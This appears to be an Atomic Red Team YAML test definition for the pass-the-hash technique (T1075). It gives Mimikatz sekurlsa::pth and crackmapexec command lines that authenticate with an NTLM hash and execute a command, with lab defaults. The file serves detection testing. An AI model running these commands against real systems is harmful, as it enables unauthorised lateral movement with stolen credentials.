---
attack_technique: T1075
display_name: Pass the Hash

atomic_tests:
- name: Mimikatz Pass the Hash
  auto_generated_guid: ec23cef9-27d9-46e4-a68d-6f75f7b86908
  description: |
    Note: must dump hashes first
    [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)

  supported_platforms:
    - windows

  input_arguments:
    user_name:
      description: username
      type: string
      default: Administrator
    domain:
      description: domain
      type: string
      default: atomic.local
    ntlm:
      description: ntlm hash
      type: string
      default: cc36cf7a8514893efccd3324464tkg1a

  executor:
    name: command_prompt
    command: |
      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}

- name: crackmapexec Pass the Hash
  auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
  description: |
     command execute with crackmapexec

  supported_platforms:
    - windows
 
  input_arguments:
    user_name:
      description: username
      type: string
      default: Administrator
    domain:
      description: domain
      type: string
      default: atomic.local
    ntlm: 
      description: command
      type: string
      default: cc36cf7a8514893efccd3324464tkg1a
    command:
      description: command to execute
      type: string
      default: whoami
    crackmapexec_exe:
      description: crackmapexec windows executable
      type: Path
      default: C:\CrackMapExecWin\crackmapexec.exe

  dependency_executor_name: powershell
  dependencies:
    - description: |
        CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
      prereq_command: |
        if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
      get_prereq_command: |
        Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}

  executor:
    name: command_prompt
    elevation_required: false
    command: |
      crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} 

